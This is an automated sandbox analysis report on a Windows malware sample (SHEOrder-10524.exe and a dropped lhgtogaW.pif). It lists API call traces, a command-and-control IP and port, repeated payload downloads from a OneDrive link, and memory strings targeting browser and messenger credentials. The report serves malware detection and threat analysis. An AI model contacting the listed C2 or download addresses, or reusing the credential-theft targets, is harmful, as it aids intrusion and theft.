                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_1_00409253
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,4_1_0041C291
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,4_1_0040C34D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_1_00409665
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,4_1_0040880C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0040783C FindFirstFileW,FindNextFileW,4_1_0040783C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,4_1_00419AF5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_1_0040BB30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_1_0040BD37
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00407C97

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 91.223.3.151
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028DC8AC InternetCheckConnectionA,0_2_028DC8AC
                  Source: global trafficTCP traffic: 192.168.2.4:49733 -> 91.223.3.151:4508
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 13.107.139.11 13.107.139.11
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: PL-SKYTECH-ASPL PL-SKYTECH-ASPL
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: global trafficHTTP traffic detected: GET /download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                  Source: global trafficHTTP traffic detected: GET /download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                  Source: global trafficHTTP traffic detected: GET /download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.223.3.151
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_0041B380
                  Source: global trafficHTTP traffic detected: GET /download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                  Source: global trafficHTTP traffic detected: GET /download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                  Source: global trafficHTTP traffic detected: GET /download?resid=B24528E77689F9AC%21162&authkey=!APfH4vXvDJEK1Qc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: lhgtogaW.pif, 00000004.00000002.4157153882.0000000027490000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000007.00000002.1781950841.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: lhgtogaW.pifString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: bhv1938.tmp.5.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
                  Source: bhv1938.tmp.5.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
                  Source: lhgtogaW.pif, 00000005.00000003.1793746944.0000000000A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: t_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                  Source: lhgtogaW.pif, 00000005.00000003.1793746944.0000000000A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: t_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                  Source: lhgtogaW.pif, 00000004.00000002.4156997111.00000000273A0000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: lhgtogaW.pif, 00000004.00000002.4156997111.00000000273A0000.00000040.10000000.00040000.00000000.sdmp, lhgtogaW.pif, 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: onedrive.live.com
                  Source: global trafficDNS traffic detected: DNS query: bnaqzw.sn.files.1drv.com
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                  Source: bhv1938.tmp.5.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: lhgtogaW.pif, lhgtogaW.pif, 00000004.00000003.1752355443.000000002419D000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1795167395.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1752093906.000000002418E000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1777938226.000000002415C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1797585028.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1752093906.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1796644094.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: SHEOrder-10524.exe, 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: lhgtogaW.pif, 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1795167395.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1777938226.000000002415C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1797585028.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1752093906.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1796644094.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpH
                  Source: lhgtogaW.pif, 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1795167395.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1777938226.000000002415C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1797585028.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1752093906.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1796644094.000000002416B000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpZ
                  Source: lhgtogaW.pif, 00000004.00000003.1777938226.000000002415C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1752093906.000000002416C000.00000004.00000020.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpu
